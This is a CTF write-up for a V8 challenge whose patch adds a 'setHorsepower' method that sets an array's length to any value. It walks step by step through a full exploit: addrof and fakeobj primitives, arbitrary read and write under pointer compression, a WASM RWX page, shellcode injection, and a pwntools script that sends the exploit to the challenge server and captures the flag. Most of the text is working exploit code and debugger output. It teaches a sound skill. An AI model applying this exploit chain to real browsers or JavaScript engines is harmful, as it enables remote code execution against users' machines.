- global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
- global_template->Set(isolate, "performance",
- Shell::CreatePerformanceTemplate(isolate));
- global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
- // Prevent fuzzers from creating side effects.
- if (!i::FLAG_fuzzing) {
- global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
- }
- global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
#ifdef V8_FUZZILLI
global_template->Set(
@@ -2243,11 +2221,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
#endif // V8_FUZZILLI
- if (i::FLAG_expose_async_hooks) {
- global_template->Set(isolate, "async_hooks",
- Shell::CreateAsyncHookTemplate(isolate));
- }
-
return global_template;
}
@@ -2449,10 +2422,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
v8::Isolate::kMessageLog);
}
- isolate->SetHostImportModuleDynamicallyCallback(
+ /*isolate->SetHostImportModuleDynamicallyCallback(
Shell::HostImportModuleDynamically);
isolate->SetHostInitializeImportMetaObjectCallback(
- Shell::HostInitializeImportMetaObject);
+ Shell::HostInitializeImportMetaObject);*/
#ifdef V8_FUZZILLI
// Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..7cf66d285a 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,8 @@ class Shell : public i::AllStatic {
kNoProcessMessageQueue = false
};
+ static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
static bool ExecuteString(Isolate* isolate, Local<String> source,
Local<Value> name, PrintResult print_result,
ReportExceptions report_exceptions,
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index ce3886e87e..6621a79618 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -1754,6 +1754,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
array_function, DONT_ENUM);
+ SimpleInstallFunction(isolate_, proto, "setHorsepower",
+ Builtins::kArraySetHorsepower, 1, false);
SimpleInstallFunction(isolate_, proto, "concat", Builtins::kArrayConcat, 1,
false);
SimpleInstallFunction(isolate_, proto, "copyWithin",
diff --git a/src/objects/js-array.tq b/src/objects/js-array.tq
index b18f5bafac..b466b330cd 100644
--- a/src/objects/js-array.tq
+++ b/src/objects/js-array.tq
@@ -28,6 +28,9 @@ extern class JSArray extends JSObject {
macro IsEmpty(): bool {
return this.length == 0;
}
+ macro SetLength(l: Smi) {
+ this.length = l;
+ }
length: Number;
}
The only really relevant code is here:
ArraySetHorsepower(js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
try {
const h: Smi = Cast<Smi>(horsepower) otherwise End;
const a: JSArray = Cast<JSArray>(receiver) otherwise End;
a.SetLength(h);
} label End {
Print("Improper attempt to set horsepower");
}
return receiver;
}
macro SetLength(l: Smi) {
this.length = l;
}
SimpleInstallFunction(isolate_, proto, "setHorsepower",
Builtins::kArraySetHorsepower, 1, false);
We can essentially set the length
of an array by using .setHorsepower()
. By setting it to a larger value, we can get an OOB read and write, from which point it would be very similar to the oob-v8 writeup.
Let's first try and check the OOB works as we expected. We're gonna create an exploit.js
with the classic ftoi()
and itof()
functions:
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
Then load up d8 under GDB. This version is a lot newer than the one from OOB-V8, so let's work out what is what.
$gdb d8
gef➤ run --allow-natives-syntax --shell exploit.js
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0xa5e08085179: [JSArray]
- map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x0a5e0820ab61 <JSArray[0]>
- elements: 0x0a5e08085161 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
- length: 2
- properties: 0x0a5e0804222d <FixedArray[0]>
- All own properties (excluding elements): {
0xa5e080446d1: [String] in ReadOnlySpace: #length: 0x0a5e0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x0a5e08085161 <FixedDoubleArray[2]> {
0: 1.5
1: 2.5
}
0xa5e082439f1: [Map]
- type: JS_ARRAY_TYPE
- instance size: 16
- inobject properties: 0
- elements kind: PACKED_DOUBLE_ELEMENTS
- unused property fields: 0
- enum length: invalid
- back pointer: 0x0a5e082439c9 <Map(HOLEY_SMI_ELEMENTS)>
- prototype_validity cell: 0x0a5e08182405 <Cell value= 1>
- instance descriptors #1: 0x0a5e0820b031 <DescriptorArray[1]>
- transitions #1: 0x0a5e0820b07d <TransitionArray[4]>Transition array #1:
0x0a5e08044fd5 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x0a5e08243a19 <Map(HOLEY_DOUBLE_ELEMENTS)>
- prototype: 0x0a5e0820ab61 <JSArray[0]>
- constructor: 0x0a5e0820a8f1 <JSFunction Array (sfi = 0xa5e0818ac31)>
- dependent code: 0x0a5e080421b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
- construction counter: 0
[1.5, 2.5]
gef➤ x/10gx 0xa5e08085179-1 <--- -1 needed due to pointer tagging!
0xa5e08085178: 0x0804222d082439f1 0x0000000408085161
0xa5e08085188: 0x58f55236080425a9 0x7566280a00000adc
0xa5e08085198: 0x29286e6f6974636e 0x20657375220a7b20
0xa5e080851a8: 0x3b22746369727473 0x6d2041202f2f0a0a
0xa5e080851b8: 0x76696e752065726f 0x7473206c61737265
So, right of the bat there are some differences. For example, look at the first value 0x0804222d082439f1
. What on earth is that? Well, if you have eagle eyes or are familiar with a new V8 feature called pointer compression, you may notice that it lines up with the properties
and the map
:
- map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- properties: 0x0a5e0804222d <FixedArray[0]>
Notice that the last 4 bytes are being stored in that value 0x0804222d082439f1
- the first 4 bytes here at the last 4 bytes of the properties
location, and the last 4 bytes are the last 4 of the map
pointer.
This is a new feature added to V8 in 2020 called pointer compression, where the first 4 bytes of pointers are not stored as they are constant for all pointers - instead, a single reference is saved, and only the lower 4 bytes are stored. The higher 4 bytes, known as the isolate root, are stored in the R13 register. More information can be found in this blog post, but it's made a huge difference to performance. As well as pointers, smis have also changed representation - instead of being 32-bit values left-shifted by 32 bits to differentiate them from pointers, they are now simply doubled (left-shifted by one bit) and therefore also stored in 32-bit space.
A double is stored as its 64-bit binary representation
An smi is a 32-bit number, but it's stored as itself left-shifted by 1 so the bottom bit is null
e.g. 0x12345678
is stored as 0x2468acf0
A pointer to an address addr
is stored as addr | 1
, that is the least significant bit is set to 1
.
e.g. 0x12345678
is stored as 0x12345679
This helps differentiate it from an smi, but not from a double!
We can see the example of an smi in the second value from the x/10gx
command above: 0x0000000408085161
. The upper 4 bytes are 4
, which is double 2
, so this is the length of the list. The lower 4 bytes correspond to the pointer to the elements
array, which stores the values themselves. Let's double-check that:
gef➤ x/4gx 0x0a5e08085161-1
0xa5e08085160: 0x0000000408042a99 0x3ff8000000000000
0xa5e08085170: 0x4004000000000000 0x0804222d082439f1
The first value 0x0000000408042a99
is the length
smi (a value of 2
, doubled as it's an smi) followed by what I assume is a pointer to the map. That's not important - what's important is the next two values are the floating-point representations of 1.5
and 2.5
(I recognise them from oob-v8!), while the value directly after is 0x0804222d082439f1
, the properties
and map
pointer. This means our OOB can work as planned! We just have to ensure we preserve the top 32 bits of this value so we don't ruin the properties
pointer.
Let's test that the OOB works as we expected by calling setHorsepower()
on an array, and reading past the end.
d8> a.setHorsepower(5)
[1.5, 2.5, , , ]
d8> a[2]
4.763796150676345e-270
d8> ftoi(a[2]).toString(16)
"804222d082439f1"
Fantastic!
This is a bit more complicated than in oob-v8, because of one simple fact: last time, we gained an addrof
primitive using this:
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
In our current scenario, you could argue that we can reuse this (with minor modifications) and get this:
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(3);
var map_float = float_arr[2];
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(2);
var map_obj = obj_arr[1];
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr[1] = map_float; // change to float map
let leak = obj_arr[0]; // read address
obj_arr[1] = map_obj; // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
However, this does not work. Why? It's the difference between these two lines:
var map_obj = obj_arr.oob();
var map_obj = obj_arr[1];
In oob-v8, we noted that the function .oob()
not only reads an index past the end, but it also returns it as a double. And that's the key difference - in this challenge, we can read past the end of the array, but this time it's treated as an object. obj_arr[1]
will, therefore, return an object - and a pretty invalid one, at that!
You might be thinking that we don't need the object map to get an addrof
primitive at all, we just can't set the map back, but we can create a one-use array. I spent an age working out why it didn't work, instead returning a NaN
, but of course it was this line:
obj_arr[1] = map_float;
Setting the map to that of a float array would never work, as it would treat the first index like an object again!
So, this time we can't copy the object map so easily. But not all is lost! Instead of having a single OOB read/write, we can set the array to have a huge length
. This way, we can use an OOB on the float array to read the map of the object array - if we set it correctly, that is.
Let's create two arrays, one of floats and one of objects. We'll also grab the float map (which will also contain the properties
pointer!) while we're at it.
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2]; // both map and properties
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);
My initial thought was to create an array like this:
var obj_arr = [3.5, 3.5, initial_obj];
And then I could slowly increment the index of float_arr
, reading along in memory until we came across two 3.5
values in a row. I would then know that the location directly after was our desired object, making a reliable leak. Unfortunately, while debugging, it seems like mixed arrays are not quite that simple (unsurprisingly, perhaps). Instead, I'm gonna hope and pray that the offset is constant (and if it's not, we'll come back and play with the mixed array further).
Let's determine the offset. I'm gonna %DebugPrint
float_arr
, obj_arr
and initial_obj
:
DebugPrint: 0x30e008085931: [JSArray]
- map: 0x30e0082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x30e00820ab61 <JSArray[0]>
- elements: 0x30e008085919 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
- length: 50
- properties: 0x30e00804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x30e008085919 <FixedDoubleArray[2]> {
0: 1.5
1: 2.5
}
DebugPrint: 0x30e008085985: [JSArray]
- map: 0x30e008243a41 <Map(PACKED_ELEMENTS)> [FastProperties]
- prototype: 0x30e00820ab61 <JSArray[0]>
- elements: 0x30e008085979 <FixedArray[1]> [PACKED_ELEMENTS]
- length: 50
- properties: 0x30e00804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x30e008085979 <FixedArray[1]> {
0: 0x30e00808594d <Object map = 0x30e0082459f9>
}
DebugPrint: 0x30e00808594d: [JS_OBJECT_TYPE]
- map: 0x30e0082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x30e008202f11 <Object map = 0x30e0082421b9>
- elements: 0x30e00804222d <FixedArray[0]> [HOLEY_ELEMENTS]
- properties: 0x30e00804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x30e0080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
}
Let's check the obj_arr
first:
gef➤ x/6gx 0x30e008085979-1
0x30e008085978: 0x0000000208042205 0x08243a410808594d
0x30e008085988: 0x080859790804222d 0x080425a900000064
0x30e008085998: 0x0000000400000003 0x0000000029386428
In line with what we get from %DebugPrint()
, we get the lower 4 bytes of 0808594d
. If we print from elements
onwards for the float_arr
:
gef➤ x/20gx 0x30e008085919-1
0x30e008085918: 0x0000000408042a99 0x3ff8000000000000
0x30e008085928: 0x4004000000000000 0x0804222d082439f1
0x30e008085938: 0x0000006408085919 0x082439f1080423d1
0x30e008085948: 0x082459f90804222d 0x0804222d0804222d
0x30e008085958: 0x08045a0100000002 0x0000000000010001
0x30e008085968: 0x080477ed080421f9 0x0000000200000088
0x30e008085978: 0x0000000208042205 0x08243a410808594d
0x30e008085988: 0x080859790804222d 0x080425a900000064
0x30e008085998: 0x0000000400000003 0x0000000029386428
0x30e0080859a8: 0x0000000000000000 0x0000000000000000
We can see the value 0x08243a410808594d
at 0x30e008085980
. If the value 1.5
at 0x22f908085370
is index 0
, we can count and get an index of 12
. Let's try that:
function addrof(obj) {
obj_arr[0] = obj;
let leak = float_arr[12];
return ftoi(leak);
}
%DebugPrint(initial_obj);
console.log("Leak: 0x" + addrof(initial_obj).toString(16))
And from the output, it looks very promising!
Leak: 0x8243a410808593d
DebugPrint: 0x28a60808593d: [JS_OBJECT_TYPE]
- map: 0x28a6082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x28a608202f11 <Object map = 0x28a6082421b9>
- elements: 0x28a60804222d <FixedArray[0]> [HOLEY_ELEMENTS]
- properties: 0x28a60804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x28a6080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
}
The lower 4 bytes match up perfectly. We're gonna return just the last 4 bytes:
return ftoi(leak) & 0xffffffffn;
And bam, we have an addrof()
primitive. Time to get a fakeobj()
.
If we follow the same principle for fakeobj()
:
function fakeobj(compressed_addr) {
float_arr[12] = itof(compressed_addr);
return obj_arr[0];
}
However, remember that pointer compression is a thing! We have to make sure the upper 4 bytes are consistent. This isn't too bad, as we can read it once and remember it for all future sets:
// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);
And then fakeobj()
becomes
function fakeobj(compressed_addr) {
float_arr[12] = itof(upper + compressed_addr);
return obj_arr[0];
}
We can test this with the following code:
// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);
If I run this, it does in fact print 1
:
gef➤ run --allow-natives-syntax --shell exploit.js
1
V8 version 9.1.0 (candidate)
d8>
Once again, we're gonna try and gain an arbitrary read by creating a fake array object that we can control the elements
pointer for. The offsets are gonna be slightly different due to pointer compression. As we saw earlier, the first 8 bytes are the compressed pointer for properties
and map
, while the second 8 bytes are the smi for length
and then the compressed pointer for elements
. Let's create an initial arb_rw_array
like before, and print out the layout:
var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
%DebugPrint(arb_rw_arr)
[+] Address of Arbitrary RW Array: 0x8085a01
DebugPrint: 0x161c08085a01: [JSArray]
- map: 0x161c082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x161c0820ab61 <JSArray[0]>
- elements: 0x161c080859d9 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]
- length: 4
- properties: 0x161c0804222d <FixedArray[0]>
- All own properties (excluding elements): {
0x161c080446d1: [String] in ReadOnlySpace: #length: 0x161c0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x161c080859d9 <FixedDoubleArray[4]> {
0: 4.7638e-270
1: 1.5
2: 2.5
3: 3.5
}
The leak works perfectly. Once again, elements
is ahead of the JSArray
itself.
If we want to try and fake an array with compression pointers then we have the following format:
32-bit pointer to properties
32-bit pointer to map
smi for length
32-bit pointer to elements
The first ones we have already solved with float_map
. We can fix the latter like this:
function arb_read(compressed_addr) {
// tag pointer
if (compressed_addr % 2n == 0)
compressed_addr += 1n;
// place a fake object over the elements of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array
// size of 2 and elements pointer
arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr);
// index 0 will returns the arbitrary read value
return ftoi(fake[0]);
}
We can test the arbitrary read, and I'm going to do this by grabbing the float_map
location and reading the data there:
// test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn
console.log("Map at: 0x" + float_map_lower.toString(16))
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));
Map at: 0x82439f1
Read: 0xa0007ff2100043d
A little bit of inspection at the location of float_map
shows us we're 8 bytes off:
gef➤ x/10gx 0x3f09082439f1-1
0x3f09082439f0: 0x1604040408042119 0x0a0007ff2100043d
0x3f0908243a00: 0x082439c90820ab61 0x080421b90820b031
0x3f0908243a10: 0x0820b07d08182405 0x1604040408042119
This is because the first 8 bytes in the elements
array are for the length
smi and then for a compressed map pointer, so we just subtract if 8
and get a valid arb_read()
:
function arb_read(compressed_addr) {
// tag pointer
if (compressed_addr % 2n == 0)
compressed_addr += 1n;
// place a fake object over the elements of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array
// size of 2 and elements pointer
// initially with the map and a size smi, so 0x8 offset
arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);
// index 0 will returns the arbitrary read value
return ftoi(fake[0]);
}
We can continue with the initial_arb_write()
from oob-v8, with a couple of minor changes:
function initial_arb_write(compressed_addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
We can test this super easily too, with the same principle:
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);
Observing the map location in GDB tells us the write worked:
gef➤ x/4gx 0xf84082439f1-1
0xf84082439f0: 0x0000000012345678 0x0a0007ff2100043d
0xf8408243a00: 0x082439c90820ab61 0x080421b90820b031
Last time we improved our technique by usingArrayBuffer
backing pointers. This is a bit harder this time because for this approach you need to know the full 64-bit pointers, not just the compressed version. This is genuinely very difficult because the isolate root is stored in the r13 register, not anywhere in memory. As a result, we're going to be using initial_arb_write()
as if it's arb_write()
, and hoping it works.
If anybody knows of a way to leak the isolate root, please let me know!
The final step is to shellcode our way through, using the same technique as last time. The offsets are slightly different, but I'm sure that by this point you can find them yourself!
First I'll use any WASM code to create the RWX page, like I did for oob-v8:
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
Again, this generates an RWX page:
gef➤ vmmap
[...]
0x000007106675a000 0x000007106675b000 0x0000000000000000 rwx
[...]
Using the same technique of printing out the wasm_instance
address and comparing it to the output of search-pattern
from before:
gef➤ search-pattern 0x000007106675a000
[+] Searching '\x00\xa0\x75\x66\x10\x07\x00\x00' in memory
[+] In (0x3c108200000-0x3c108280000), permission=rw-
0x3c108211ad4 - 0x3c108211af4 → "\x00\xa0\x75\x66\x10\x07\x00\x00[...]"
[...]
I get an offset of 0x67
. In reality it is 0x68
(pointer tagging!), but who cares.
Now we can use the ArrayBuffer
technique, because we know all the bits of the address! We can just yoink it directly from the oob-v8 writeup (slightly changing 0x20
to 0x14
, as that is the new offset with compression):
function copy_shellcode(addr, shellcode) {
// create a buffer of 0x100 bytes
let buf = new ArrayBuffer(0x100);
let dataview = new DataView(buf);
// overwrite the backing store so the 0x100 bytes can be written to where we want
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x14n;
arb_write(backing_store_addr, addr);
// write the shellcode 4 bytes at a time
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
I am going to grab the shellcode for cat flag.txt
from this writeup, because I suck ass at working out endianness and it's a lot of effort for a fail :)))
payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();
Running this:
$ ./d8 exploit.js
[+] Address of Arbitrary RW Array: 0x8086551
[+] RWX Region located at 0xf06b12a5000
cat: flag.txt: No such file or directory
Ok, epic! Let's deliver it remote using the same script as Kit Engine:
from pwn import *
with open("exploit.js", "rb") as f:
exploit = f.read()
p = remote('mercury.picoctf.net', 60233)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)
p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())
And we get the flag!
$ python3 deliver.py
[+] Opening connection to mercury.picoctf.net on port 60233: Done
picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}
[*] Closed connection to mercury.picoctf.net port 60233
This is going to document my journey into V8 exploitation, and hopefully provide some tools to help you learn too.
To start with, we're going to go through *CTF's OOB-V8 challenge, mostly following Faith's brilliantly in-depth writeup. From there, well, we'll see.
Saelo's classic V8 paper is also a goldmine.